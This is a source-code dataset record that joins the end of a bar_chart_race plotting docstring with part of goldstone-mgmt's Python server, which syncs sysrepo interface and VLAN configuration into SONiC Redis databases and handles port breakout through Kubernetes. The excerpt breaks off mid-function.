bar_texttemplate : str, default '%{x:,.0f}' or '%{y:,.0f}'
Template string used for rendering the text inside/outside
the bars. Variables are inserted using %{variable},
for example "y: %{y}". Numbers are formatted using
d3-format's syntax %{variable:d3-format}, for example
"Price: %{y:$.2f}".
bar_label_font : number or dict, None
Font size of numeric bar labels. When None, font size is 12.
Use a dictionary to supply several font properties.
Example:
{
'size': 12,
'family': 'Courier New, monospace',
'color': '#7f7f7f'
}
tick_label_font : number or dict, None
Font size of tick labels.When None, font size is 12.
Use a dictionary to supply several font properties.
hovertemplate : str, default None
Template string used for rendering the information that appear
on hover box. By default, it is '%{y} - %{x:,.0f}<extra></extra>'
Reference: https://plotly.com/python/hover-text-and-formatting
slider : bool, default True
Whether or not to place a slider below the animation
scale : 'linear' or 'log', default 'linear'
Type of scaling to use for the axis containing the values
bar_kwargs : dict, default `None` (opacity=.8)
Other keyword arguments (within a dictionary) forwarded to the
plotly `go.Bar` function. If no value for 'opacity' is given,
then it is set to .8 by default.
layout_kwargs : dict or go.Layout instance, default None
Other keyword arguments (within a dictionary) are forwarded to
the plotly `go.Layout` function. Use this to control the size of
the figure.
Example:
{
'width': 600,
'height': 400,
'showlegend': True
}
write_html_kwargs : dict, default None
Arguments passed to the write_html plotly go.Figure method.
Example:
{
'auto_play': False,
'include_plotlyjs': 'cdn',
'full_html': False=
}
Reference: https://plotly.github.io/plotly.py-docs/generated/plotly.io.write_html.html
filter_column_colors : bool, default `False`
When setting n_bars, it's possible that some columns never
appear in the animation. Regardless, all columns get assigned
a color by default.
For instance, suppose you have 100 columns
in your DataFrame, set n_bars to 10, and 15 different columns
make at least one appearance in the animation. Even if your
colormap has at least 15 colors, it's possible that many
bars will be the same color, since each of the 100 columns is
assigned of the colormaps colors.
Setting this to `True` will map your colormap to just those
columns that make an appearance in the animation, helping
avoid duplication of colors.
Setting this to `True` will also have the (possibly unintended)
consequence of changing the colors of each color every time a
new integer for n_bars is used.
EXPERIMENTAL
This parameter is experimental and may be changed/removed
in a later version.
Returns
-------
When `filename` is left as `None`, a plotly figure is returned and
embedded into the notebook. Otherwise, a file of the HTML is
saved and `None` is returned.
References
-----
Plotly Figure - https://plotly.com/python/reference
Plotly API - https://plotly.com/python-api-reference
d3 formatting - https://github.com/d3/d3-3.x-api-reference/blob/master/Formatting.md
Examples
--------
Use the `load_data` function to get an example dataset to
create an animation.
df = bcr.load_dataset('covid19')
bcr.bar_chart_race(
df=df,
filename='covid19_horiz_desc.html',
orientation='h',
sort='desc',
n_bars=8,
fixed_order=False,
fixed_max=True,
steps_per_period=10,
period_length=500,
interpolate_period=False,
period_label={'x': .99, 'y': .8, 'font': {'size': 25, 'color': 'blue'}},
period_template='%B %d, %Y',
period_summary_func=lambda v, r: {'x': .85, 'y': .2,
's': f'Total deaths: {v.sum()}',
'size': 11},
perpendicular_bar_func='median',
colors='dark12',
title='COVID-19 Deaths by Country',
bar_size=.95,
bar_textposition='outside',
bar_texttemplate='%{x}',
bar_label_font=12,
tick_label_font=12,
hovertemplate=None,
scale='linear',
bar_kwargs={'opacity': .7},
write_html_kwargs=None,
filter_column_colors=False)
'''
bcr = _BarChartRace(df, filename, orientation, sort, n_bars, fixed_order, fixed_max,
steps_per_period, period_length, end_period_pause, interpolate_period,
period_label, period_template, period_summary_func, perpendicular_bar_func,
colors, title, bar_size, bar_textposition, bar_texttemplate, bar_label_font,
tick_label_font, hovertemplate, slider, scale, bar_kwargs, layout_kwargs,
write_html_kwargs, filter_column_colors)
return bcr.make_animation()
| 42.90445 | 107 | 0.580494 |
5b5a19f112108097df97f1bf855457ee610e3f9a | 51,036 | py | Python | src/south/sonic/gssonic/main.py | palcnetworks/goldstone-mgmt | 4008ff691f3c5e38b2d53c122bace483b0235e55 | [
"Apache-2.0"
] | 1 | 2021-03-29T14:20:14.000Z | 2021-03-29T14:20:14.000Z | src/south/sonic/gssonic/main.py | palcnetworks/goldstone-mgmt | 4008ff691f3c5e38b2d53c122bace483b0235e55 | [
"Apache-2.0"
] | 6 | 2020-07-17T16:00:45.000Z | 2020-09-09T20:40:33.000Z | src/south/sonic/gssonic/main.py | palcnetworks/goldstone-mgmt | 4008ff691f3c5e38b2d53c122bace483b0235e55 | [
"Apache-2.0"
] | 4 | 2020-07-12T14:48:08.000Z | 2021-03-31T07:02:14.000Z | import sysrepo
import libyang
import logging
import asyncio
import argparse
import json
import signal
import struct
import base64
import swsssdk
import re
import redis
import os
from .k8s_api import incluster_apis
logger = logging.getLogger(__name__)
COUNTER_PORT_MAP = "COUNTERS_PORT_NAME_MAP"
COUNTER_TABLE_PREFIX = "COUNTERS:"
REDIS_SERVICE_HOST = os.getenv("REDIS_SERVICE_HOST")
REDIS_SERVICE_PORT = os.getenv("REDIS_SERVICE_PORT")
def _decode(string):
if hasattr(string, "decode"):
return string.decode("utf-8")
return string
def yang_val_to_speed(yang_val):
yang_val = yang_val.split("_")
return int(yang_val[1].split("GB")[0])
def speed_to_yang_val(speed):
# Considering only speeds supported in CLI
if speed == b"25000":
return "SPEED_25GB"
elif speed == b"50000":
return "SPEED_50GB"
elif speed == b"100000":
return "SPEED_100GB"
elif speed == b"10000":
return "SPEED_10GB"
elif speed == b"1000":
return "SPEED_1GB"
raise sysrepo.SysrepoInvalArgError(f"unsupported speed: {speed}")
class Server(object):
def __init__(self):
self.sonic_db = swsssdk.SonicV2Connector()
# HMSET is not available in above connector, so creating new one
self.sonic_configdb = swsssdk.ConfigDBConnector()
self.sonic_configdb.connect()
self.loop = asyncio.get_event_loop()
self.conn = sysrepo.SysrepoConnection()
self.sess = self.conn.start_session()
self.is_usonic_rebooting = False
self.k8s = incluster_apis()
self.counter_dict = {
"SAI_PORT_STAT_IF_IN_UCAST_PKTS": 0,
"SAI_PORT_STAT_IF_IN_ERRORS": 0,
"SAI_PORT_STAT_IF_IN_DISCARDS": 0,
"SAI_PORT_STAT_IF_IN_BROADCAST_PKTS": 0,
"SAI_PORT_STAT_IF_IN_MULTICAST_PKTS": 0,
"SAI_PORT_STAT_IF_IN_UNKNOWN_PROTOS": 0,
"SAI_PORT_STAT_IF_OUT_UCAST_PKTS": 0,
"SAI_PORT_STAT_IF_OUT_ERRORS": 0,
"SAI_PORT_STAT_IF_OUT_DISCARDS": 0,
"SAI_PORT_STAT_IF_OUT_BROADCAST_PKTS": 0,
"SAI_PORT_STAT_IF_OUT_MULTICAST_PKTS": 0,
"SAI_PORT_STAT_IF_OUT_UNKNOWN_PROTOS": 0,
"SAI_PORT_STAT_IF_IN_OCTETS": 0,
"SAI_PORT_STAT_IF_OUT_OCTETS": 0,
}
self.counter_if_dict = {}
self.notif_if = {}
self.mtu_default = self.get_default_from_yang("mtu")
self.speed_default = "100000"
def stop(self):
self.sess.stop()
self.conn.disconnect()
def get_default_from_yang(self, key):
ctx = self.sess.get_ly_ctx()
xpath = "/goldstone-interfaces:interfaces"
xpath += "/goldstone-interfaces:interface"
if key == "mtu":
xpath += "/goldstone-ip:ipv4"
xpath += "/goldstone-ip:mtu"
for node in ctx.find_path(xpath):
return node.default()
def get_config_db_keys(self, pattern):
keys = self.sonic_db.keys(self.sonic_db.CONFIG_DB, pattern=pattern)
return map(_decode, keys) if keys else []
def set_config_db(self, event, _hash, key, value):
if event != "done":
return
return self.sonic_db.set(self.sonic_db.CONFIG_DB, _hash, key, value)
async def restart_usonic(self):
self.is_usonic_rebooting = True
await self.k8s.restart_usonic()
async def watch_pods(self):
await self.k8s.watch_pods()
logger.debug("uSONiC deployment ready")
# Enable counters in SONiC
self.enable_counters()
# After usonic is UP , its taking approximately
# 15 seconds to populate counter data
logger.debug("waiting another 15 seconds for counters")
await asyncio.sleep(15)
# Caching base values of counters
self.cache_counters()
logger.info("uSONiC ready")
async def wait_for_sr_unlock(self):
# Since is_locked() is returning False always,
# Waiting to take lock
while True:
try:
with self.sess.lock("goldstone-interfaces"):
with self.sess.lock("goldstone-vlan"):
break
except:
# If taking lock fails
await asyncio.sleep(0.1)
continue
# Release lock and return
return
def parse_change_req(self, xpath):
xpath = xpath.split("/")
_hash = ""
key = ""
member = ""
attr_dict = {"xpath": xpath}
for i in range(len(xpath)):
node = xpath[i]
if node.find("interface") == 0:
ifname = node.split("'")[1]
intf_names = self.sonic_db.keys(
self.sonic_db.CONFIG_DB, pattern="PORT|" + ifname
)
if intf_names == None:
logger.debug(
"*************** Invalid Interface name ****************"
)
raise sysrepo.SysrepoInvalArgError("Invalid Interface name")
attr_dict.update({"ifname": ifname})
_hash = _hash + "PORT|" + ifname
if i + 1 < len(xpath):
key = xpath[i + 1]
if key == "goldstone-ip:ipv4" and i + 2 < len(xpath):
key = xpath[i + 2]
if key == "breakout" and i + 2 < len(xpath):
key = xpath[i + 2]
break
if node.find("VLAN_LIST") == 0:
_hash = _hash + "VLAN|" + node.split("'")[1]
if i + 1 < len(xpath):
if xpath[i + 1].find("members") == 0 and xpath[i + 1] != "members":
key = "members@"
member = xpath[i + 1].split("'")[1]
elif xpath[i + 1] == "members":
key = "members@"
else:
key = xpath[i + 1]
attr_dict.update({"member": member})
break
if node.find("VLAN_MEMBER_LIST") == 0:
_hash = (
_hash
+ "VLAN_MEMBER|"
+ node.split("'")[1]
+ "|"
+ node.split("'")[3]
)
if i + 1 < len(xpath):
key = xpath[i + 1]
break
return key, _hash, attr_dict
async def breakout_callback(self):
self.sess.switch_datastore("running")
await self.wait_for_sr_unlock()
with self.sess.lock("goldstone-interfaces"):
with self.sess.lock("goldstone-vlan"):
await self.watch_pods()
self.reconcile()
self.update_oper_db()
self.is_usonic_rebooting = False
self.sess.switch_datastore("running")
async def breakout_update_usonic(self, breakout_dict):
logger.debug("Starting to Update usonic's configMap and deployment")
interface_list = []
self.sess.switch_datastore("running")
# Frame interface_list with data available in sysrepo
intf_data = self.sess.get_data("/goldstone-interfaces:interfaces")
if "interfaces" in intf_data:
intf_list = intf_data["interfaces"]["interface"]
for intf in intf_list:
ifname = intf["name"]
# Prioirty for adding interfaces in interface_list:
#
# 1. Preference will be for the data received as arguments
# as this data will not be commited in sysrepo yet.
# 2. Interfaces present in datastore with already configured
# breakout data or without breakout data
if ifname in breakout_dict:
speed = None
breakout_data = breakout_dict[ifname]
if breakout_data["channel-speed"] != None:
speed = yang_val_to_speed(breakout_data["channel-speed"])
interface_list.append(
[ifname, breakout_data["num-channels"], speed]
)
else:
if "breakout" in intf:
breakout_data = intf["breakout"]
speed = None
if breakout_data["channel-speed"] != None:
speed = yang_val_to_speed(breakout_data["channel-speed"])
interface_list.append(
[ifname, breakout_data["num-channels"], speed]
)
else:
interface_list.append([ifname, None, None])
is_updated = await self.k8s.update_usonic_config(interface_list)
# Restart deployment if configmap update is successful
if is_updated:
await self.restart_usonic()
return is_updated
def get_running_data(self, xpath):
self.sess.switch_datastore("running")
return self.sess.get_data(xpath)
def is_breakout_port(self, ifname):
xpath = f"/goldstone-interfaces:interfaces/interface[name='{ifname}']"
self.sess.switch_datastore("operational")
data = self.sess.get_data(xpath, no_subs=True)
try:
logger.debug(f"data: {data}")
data = data["interfaces"]["interface"][ifname]["breakout"]
if data.get("num-channels", 1) > 1 or "parent" in data:
return True
except KeyError:
return False
return False
def get_configured_breakout_ports(self, ifname):
xpath = f"/goldstone-interfaces:interfaces/interface"
self.sess.switch_datastore("operational")
data = self.sess.get_data(xpath, no_subs=True)
logger.debug(f"get_configured_breakout_ports: {ifname}, {data}")
ports = []
for intf in data.get("interfaces", {}).get("interface", []):
try:
if intf["breakout"]["parent"] == ifname:
name = intf["name"]
d = self.get_running_data(f"{xpath}[name='{name}']")
logger.debug(f"get_configured_breakout_ports: {name}, {d}")
ports.append(intf["name"])
except (sysrepo.errors.SysrepoNotFoundError, KeyError):
pass
logger.debug(f"get_configured_breakout_ports: ports: {ports}")
return ports
def vlan_change_cb(self, event, req_id, changes, priv):
logger.debug(f"event: {event}, changes: {changes}")
if event not in ["change", "done"]:
logger.warn("unsupported event: {event}")
return
for change in changes:
key, _hash, attr_dict = self.parse_change_req(change.xpath)
if "member" in attr_dict:
member = attr_dict["member"]
logger.debug(f"key: {key}, _hash: {_hash}, attr_dict: {attr_dict}")
if isinstance(change, sysrepo.ChangeCreated):
logger.debug(f"change created: {change}")
if type(change.value) != type({}) and key != "name" and key != "ifname":
if key == "members@":
try:
mem = _decode(
self.sonic_db.get(self.sonic_db.CONFIG_DB, _hash, key)
)
mem_list = mem.split(",")
if change.value not in mem_list:
mem + "," + str(change.value)
self.set_config_db(event, _hash, key, mem)
except:
self.set_config_db(event, _hash, key, change.value)
else:
self.set_config_db(event, _hash, key, change.value)
if isinstance(change, sysrepo.ChangeModified):
logger.debug(f"change modified: {change}")
raise sysrepo.SysrepoUnsupportedError("Modification is not supported")
if isinstance(change, sysrepo.ChangeDeleted):
logger.debug(f"change deleted: {change}")
if key == "members@":
mem = _decode(
self.sonic_db.get(self.sonic_db.CONFIG_DB, _hash, key)
)
if mem != None:
mem = mem.split(",")
if member in mem:
mem.remove(member)
if len(mem) >= 1:
value = ",".join(mem)
self.set_config_db(event, _hash, key, value)
elif _hash.find("VLAN|") == 0 and key == "":
if event == "done":
self.sonic_db.delete(self.sonic_db.CONFIG_DB, _hash)
elif _hash.find("VLAN_MEMBER|") == 0 and key == "":
if event == "done":
self.sonic_db.delete(self.sonic_db.CONFIG_DB, _hash)
async def intf_change_cb(self, event, req_id, changes, priv):
logger.debug(f"change_cb: event: {event}, changes: {changes}")
if event not in ["change", "done"]:
logger.warn("unsupported event: {event}")
return
valid_speeds = [40000, 100000]
breakout_valid_speeds = [] # no speed change allowed for sub-interfaces
for change in changes:
logger.debug(f"change_cb: {change}")
key, _hash, attr_dict = self.parse_change_req(change.xpath)
if "ifname" in attr_dict:
ifname = attr_dict["ifname"]
logger.debug(f"key: {key}, _hash: {_hash}, attr_dict: {attr_dict}")
if isinstance(change, sysrepo.ChangeCreated):
logger.debug("......change created......")
if type(change.value) != type({}) and key != "name" and key != "ifname":
if key == "description" or key == "alias":
self.set_config_db(event, _hash, key, change.value)
elif key == "admin-status":
self.set_config_db(event, _hash, "admin_status", change.value)
elif key == "speed":
if event == "change":
ifname = attr_dict["ifname"]
if self.is_breakout_port(ifname):
valids = breakout_valid_speeds
else:
valids = valid_speeds
if change.value not in valids:
logger.debug(
f"invalid speed: {change.value}, candidates: {valids}"
)
raise sysrepo.SysrepoInvalArgError("Invalid speed")
self.set_config_db(event, _hash, "speed", change.value)
elif key == "forwarding" or key == "enabled":
logger.debug(
"This key:{} should not be set in redis ".format(key)
)
elif key == "num-channels" or key == "channel-speed":
logger.debug(
"This key:{} should not be set in redis ".format(key)
)
# TODO use the parent leaf to detect if this is a sub-interface or not
# using "_1" is vulnerable to the interface nameing schema change
if "_1" not in ifname:
raise sysrepo.SysrepoInvalArgError(
"breakout cannot be configured on a sub-interface"
)
paired_key = (
"num-channels"
if key == "channel-speed"
else "channel-speed"
)
tmp_xpath = change.xpath.replace(key, paired_key)
try:
_data = self.get_running_data(tmp_xpath)
except:
logger.debug("Both Arguments are not present yet")
break
try:
if_list = _data["interfaces"]["interface"]
for intf in if_list:
paired_value = intf["breakout"][paired_key]
except KeyError:
logging.error(
f"Failed fetching {paired_key} from get_data for breakout"
)
break
# We will wait for both the parameters of breakout in yang to be
# configured on the parent interface.
#
# Once configuration is done, we will update the configmap and
# deployment in breakout_update_usonic() function.
# After the update, we will watch asynchronosly in watch_pods()
# for the `usonic` deployment to be UP.
#
# Once `usonic` deployment is UP, another asynchronous call breakout_callback()
# will do the following:
# 1. Delete all the sub-interfaces created in operational datastore (during
# breakout delete operation)
# 2. Reconciliation will be run to populate Redis DB(from running datastore)
# and coresponding data in operational datastore (during breakout config,
# new sub-interfaces will be added in operational datastore in this step)
logger.info(
"Both Arguments are present for breakout {} {}".format(
change.value, paired_value
)
)
breakout_dict = {
ifname: {key: change.value, paired_key: paired_value}
}
if event == "done":
is_updated = await self.breakout_update_usonic(
breakout_dict
)
if is_updated:
asyncio.create_task(self.breakout_callback())
else:
self.set_config_db(event, _hash, key, change.value)
if isinstance(change, sysrepo.ChangeModified):
logger.debug("......change modified......")
if key == "description" or key == "alias":
self.set_config_db(event, _hash, key, change.value)
elif key == "admin-status":
self.set_config_db(event, _hash, "admin_status", change.value)
elif key == "forwarding" or key == "enabled":
logger.debug("This key:{} should not be set in redis ".format(key))
elif key == "speed":
if event == "change":
if self.is_breakout_port(ifname):
valids = breakout_valid_speeds
else:
valids = valid_speeds
if change.value not in valids:
logger.debug("****** Invalid speed value *********")
raise sysrepo.SysrepoInvalArgError("Invalid speed")
self.set_config_db(event, _hash, "speed", change.value)
elif key == "num-channels" or key == "channel-speed":
logger.debug("This key:{} should not be set in redis ".format(key))
raise sysrepo.SysrepoInvalArgError(
"Breakout config modification not supported"
)
else:
self.set_config_db(event, _hash, key, change.value)
if isinstance(change, sysrepo.ChangeDeleted):
logger.debug("......change deleted......")
if key in ["channel-speed", "num-channels"]:
if event == "change":
if len(self.get_configured_breakout_ports(ifname)):
raise sysrepo.SysrepoInvalArgError(
"Breakout can't be removed due to the dependencies"
)
continue
assert event == "done"
# change.xpath is
# /goldstone-interfaces:interfaces/interface[name='xxx']/breakout/channel-speed
# or
# /goldstone-interfaces:interfaces/interface[name='xxx']/breakout/num-channels
#
# set xpath to /goldstone-interfaces:interfaces/interface[name='xxx']/breakout
xpath = "/".join(change.xpath.split("/")[:-1])
try:
data = self.get_running_data(xpath)
except sysrepo.errors.SysrepoNotFoundError:
ch = None
speed = None
else:
if_list = data["interfaces"]["interface"]
assert len(if_list) == 1
intf = list(if_list)[0]
config = intf.get("breakout", {})
ch = config.get("num-channels", None)
speed = config.get("channel-speed", None)
# if both channel and speed configuration are deleted
# remove the breakout config from uSONiC
if ch != None or speed != None:
logger.debug(
"breakout config still exists: ch: {ch}, speed: {speed}"
)
continue
breakout_dict = {
ifname: {"num-channels": None, "channel-speed": None}
}
is_updated = await self.breakout_update_usonic(breakout_dict)
if is_updated:
asyncio.create_task(self.breakout_callback())
elif key in ["mtu", "speed"]:
if event == "done":
if key == "mtu":
value = self.mtu_default
elif key == "speed":
value = self.speed_default
logger.debug(f"adding default value of {key} to redis")
self.pack_defaults_to_redis(ifname=ifname, leaf_node=key)
self.update_oper_db()
elif "PORT|" in _hash and key == "":
if event == "done":
# since sysrepo wipes out the pushed entry in oper ds
# when the corresponding entry in running ds is deleted,
# we need to repopulate the oper ds.
#
# this behavior might change in the future
# https://github.com/sysrepo/sysrepo/issues/1937#issuecomment-742851607
self.update_oper_db()
def get_counter(self, ifname, counter):
if ifname not in self.counter_if_dict:
return 0
base = self.counter_if_dict[ifname].get(counter, 0)
key = _decode(
self.sonic_db.get(self.sonic_db.COUNTERS_DB, COUNTER_PORT_MAP, ifname)
)
try:
key = "COUNTERS:" + key
present = _decode(
self.sonic_db.get(self.sonic_db.COUNTERS_DB, key, counter)
)
except:
return 0
if base and present:
return int(present) - int(base)
return 0
def get_oper_data(self, req_xpath):
def delta_counter_value(base, present):
if base and present:
return int(present) - int(base)
else:
return 0
path_prefix = "/goldstone-interfaces:interfaces/interface[name='"
if req_xpath.endswith("oper-status"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/oper-status", "")
key = ifname.replace("Ethernet", "PORT_TABLE:Ethernet")
data = _decode(self.sonic_db.get(self.sonic_db.APPL_DB, key, "oper_status"))
return data
elif req_xpath.endswith("in-octets"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/in-octets", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_IN_OCTETS")
elif req_xpath.endswith("in-unicast-pkts"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/in-unicast-pkts", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_IN_UCAST_PKTS")
elif req_xpath.endswith("in-broadcast-pkts"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/in-broadcast-pkts", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_IN_BROADCAST_PKTS")
elif req_xpath.endswith("in-multicast-pkts"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/in-multicast-pkts", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_IN_MULTICAST_PKTS")
elif req_xpath.endswith("in-discards"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/in-discards", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_IN_DISCARDS")
elif req_xpath.endswith("in-errors"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/in-errors", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_IN_ERRORS")
elif req_xpath.endswith("in-unknown-protos"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/in-unknown-protos", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_IN_UNKNOWN_PROTOS")
elif req_xpath.endswith("out-octets"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/out-octets", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_OUT_OCTETS")
elif req_xpath.endswith("out-unicast-pkts"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/out-unicast-pkts", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_OUT_UCAST_PKTS")
elif req_xpath.endswith("out-broadcast-pkts"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/out-broadcast-pkts", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_OUT_BROADCAST_PKTS")
elif req_xpath.endswith("out-multicast-pkts"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/out-multicast-pkts", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_OUT_MULTICAST_PKTS")
elif req_xpath.endswith("out-discards"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/out-discards", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_OUT_DISCARDS")
elif req_xpath.endswith("out-errors"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/out-errors", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_OUT_ERRORS")
def interface_oper_cb(self, req_xpath):
# Changing to operational datastore to fetch data
# for the unconfigurable params in the xpath, data will
# be fetched from Redis and complete data will be returned.
# Use 'no_subs=True' parameter in oper_cb to fetch data from operational
# datastore and to avoid locking of sysrepo db
self.sess.switch_datastore("operational")
r = {}
path_list = req_xpath.split("/")
statistic_leaves = [
"in-octets",
"in-unicast-pkts",
"in-broadcast-pkts",
"in-multicast-pkts",
"in-discards",
"in-errors",
"in-unknown-protos",
"out-octets",
"out-unicast-pkts",
"out-broadcast-pkts",
"out-multicast-pkts",
"out-discards",
"out-errors",
]
if len(path_list) <= 3:
r = self.sess.get_data(req_xpath, no_subs=True)
if r == {}:
return r
else:
for intf in r["interfaces"]["interface"]:
ifname = intf["name"]
xpath = (
f"/goldstone-interfaces:interfaces/interface[name='{ifname}']"
)
oper_status = self.get_oper_data(xpath + "/oper-status")
if oper_status != None:
intf["oper-status"] = oper_status
xpath = f"/goldstone-interfaces:interfaces/interface[name='{ifname}']/statistics"
intf["statistics"] = {}
for sl in statistic_leaves:
sl_value = self.get_oper_data(xpath + "/" + sl)
if sl_value != None:
intf["statistics"][sl] = sl_value
return r
elif req_xpath[-10:] == "statistics":
xpath_T = req_xpath.replace("/statistics", "")
r = self.sess.get_data(xpath_T, no_subs=True)
if r == {}:
return r
else:
for intf in r["interfaces"]["interface"]:
ifname = intf["name"]
intf["statistics"] = {}
xpath = f"/goldstone-interfaces:interfaces/interface[name='{ifname}']/statistics"
for sl in statistic_leaves:
sl_value = self.get_oper_data(xpath + "/" + sl)
if sl_value != None:
intf["statistics"][sl] = sl_value
return r
elif (
path_list[len(path_list) - 1] in statistic_leaves
or path_list[len(path_list) - 1] == "oper-status"
):
xpath_T = req_xpath.replace(
"/statistics/" + path_list[len(path_list) - 1], ""
)
xpath_T = xpath_T.replace("/oper-status", "")
r = self.sess.get_data(xpath_T, no_subs=True)
if r == {}:
return r
else:
for intf in r["interfaces"]["interface"]:
ifname = intf["name"]
if path_list[len(path_list) - 1] == "oper-status":
value = self.get_oper_data(req_xpath)
if value != None:
intf["oper-status"] = value
else:
intf["statistics"] = {}
value = self.get_oper_data(req_xpath)
if value != None:
intf["statistics"][path_list[len(path_list) - 1]] = value
return r
return r
def oper_cb(self, sess, xpath, req_xpath, parent, priv):
logger.debug(
"****************************inside oper-callback******************************"
)
if self.is_usonic_rebooting:
logger.debug("usonic is rebooting. no handling done in oper-callback")
return
if req_xpath.find("/goldstone-interfaces:interfaces") == 0:
return self.interface_oper_cb(req_xpath)
def cache_counters(self):
self.counter_if_dict = {}
for key in self.get_config_db_keys("PORT|Ethernet*"):
ifname = key.split("|")[1]
key = _decode(
self.sonic_db.get(self.sonic_db.COUNTERS_DB, COUNTER_PORT_MAP, ifname)
)
if not key:
continue
tmp_counter_dict = {}
counter_key = COUNTER_TABLE_PREFIX + key
for counter_name in self.counter_dict.keys():
counter_data = _decode(
self.sonic_db.get(
self.sonic_db.COUNTERS_DB, counter_key, counter_name
)
)
tmp_counter_dict[counter_name] = counter_data
self.counter_if_dict[ifname] = tmp_counter_dict
def enable_counters(self):
# This is similar to "counterpoll port enable"
value = {"FLEX_COUNTER_STATUS": "enable"}
self.sonic_configdb.mod_entry("FLEX_COUNTER_TABLE", "PORT", value)
def clear_counters(self, xpath, input_params, event, priv):
logger.debug(
f"clear_counters: xpath: {xpath}, input: {input}, event: {event}, priv: {priv}"
)
self.cache_counters()
def pack_defaults_to_redis(self, ifname, leaf_node):
if leaf_node == "mtu":
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"PORT|" + ifname,
"mtu",
str(self.mtu_default),
)
elif leaf_node == "speed" and not self.is_breakout_port(ifname):
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"PORT|" + ifname,
"speed",
self.speed_default,
)
def reconcile(self):
self.sess.switch_datastore("running")
intf_data = self.sess.get_data("/goldstone-interfaces:interfaces")
if "interfaces" in intf_data:
intf_list = intf_data["interfaces"]["interface"]
for intf in intf_list:
name = intf.pop("name")
logger.debug(f"interface config: {intf}")
for key in intf:
if key == "ipv4":
if "mtu" in intf[key]:
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"PORT|" + name,
"mtu",
str(intf[key]["mtu"]),
)
elif key == "description":
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"PORT|" + name,
"description",
str(intf[key]),
)
elif key == "alias":
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"PORT|" + name,
"alias",
str(intf[key]),
)
elif key == "admin-status":
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"PORT|" + name,
"admin_status",
str(intf[key]),
)
elif key == "if-index":
pass
elif key == "breakout":
# Breakout configs are handled above
pass
else:
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"PORT|" + name,
key,
str(intf[key]),
)
vlan_data = self.sess.get_data("/goldstone-vlan:vlan")
if "vlan" in vlan_data:
logger.debug(f"vlan config: {vlan_data}")
if "VLAN" in vlan_data["vlan"]:
vlan_list = vlan_data["vlan"]["VLAN"]["VLAN_LIST"]
for vlan in vlan_list:
name = vlan.pop("name")
for key in vlan:
if key == "members":
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"VLAN|" + name,
"members@",
",".join(vlan[key]),
)
else:
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"VLAN|" + name,
key,
str(vlan[key]),
)
if "VLAN_MEMBER" in vlan_data["vlan"]:
vlan_member_list = vlan_data["vlan"]["VLAN_MEMBER"]["VLAN_MEMBER_LIST"]
for vlan_member in vlan_member_list:
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"VLAN_MEMBER|"
+ vlan_member["name"]
+ "|"
+ vlan_member["ifname"],
"tagging_mode",
vlan_member["tagging_mode"],
)
for key in self.get_config_db_keys("PORT|Ethernet*"):
ifname = key.split("|")[1]
intf_data = self.sonic_db.get_all(self.sonic_db.CONFIG_DB, key)
intf_keys = [v.decode("ascii") for v in list(intf_data.keys())]
if "admin_status" not in intf_keys:
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"PORT|" + ifname,
"admin_status",
"down",
)
if "mtu" not in intf_keys:
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"PORT|" + ifname,
"mtu",
str(self.mtu_default),
)
def update_oper_db(self):
logger.debug("updating operational db")
with self.conn.start_session() as sess:
sess.switch_datastore("operational")
try:
v = sess.get_data("/goldstone-interfaces:*", no_subs=True)
logger.debug(f"interface oper ds before delete: {v}")
# clear the intf operational ds and build it from scratch
sess.delete_item("/goldstone-interfaces:interfaces")
v = sess.get_data("/goldstone-interfaces:*", no_subs=True)
logger.debug(f"interface oper ds after delete: {v}")
except Exception as e:
logger.debug(e)
hash_keys = self.sonic_db.keys(
self.sonic_db.APPL_DB, pattern="PORT_TABLE:Ethernet*"
)
if hash_keys != None:
hash_keys = map(_decode, hash_keys)
for _hash in hash_keys:
ifname = _hash.split(":")[1]
xpath = (
f"/goldstone-interfaces:interfaces/interface[name='{ifname}']"
)
intf_data = self.sonic_db.get_all(self.sonic_db.APPL_DB, _hash)
logger.debug(f"key: {_hash}, value: {intf_data}")
for key in intf_data:
value = _decode(intf_data[key])
key = _decode(key)
if key == "alias" or key == "description":
sess.set_item(f"{xpath}/{key}", value)
elif key == "admin_status":
if value == None:
value = "down"
